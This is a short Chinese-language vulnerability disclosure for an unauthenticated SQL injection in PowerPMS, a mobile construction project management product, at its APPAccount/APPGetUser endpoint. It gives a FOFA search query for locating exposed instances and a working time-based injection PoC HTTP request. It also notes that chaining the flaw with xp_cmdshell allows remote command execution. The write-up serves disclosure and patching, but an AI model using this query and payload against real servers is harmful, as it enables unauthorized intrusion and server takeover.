0x01 产品简介

PowerPMS是上海普华科技自主研发的移动端工程项目管理产品。支持中英文切换，可与普华PowerOn、PowerPiP系列产品配套使用。产品与工程项目为核心，为项目各参建方提供包括任务管理、文档管理、质量检查、安全检查、施工日志、进度反馈、即时消息等功能在内的服务。产品通过与WEB数据联动、工作流程、消息机制、在线协作，为工程项目跨组织、跨专业、跨地域多方协作提供了解决方案，可有效提高业主、工程总包、施工单位等项目各参与方的沟通与协作效率。

0x02 漏洞概述

普华-PowerPMS APPGetUser 接口处存在SQL注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令，从而控制服务器。经过分析与研判，该漏洞利用难度低，建议尽快修复。

0x03 复现环境

FOFA：app="普华科技-PowerPMS"

0x04 漏洞复现

PoC

GET /APPAccount/APPGetUser?name=1%27%29%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US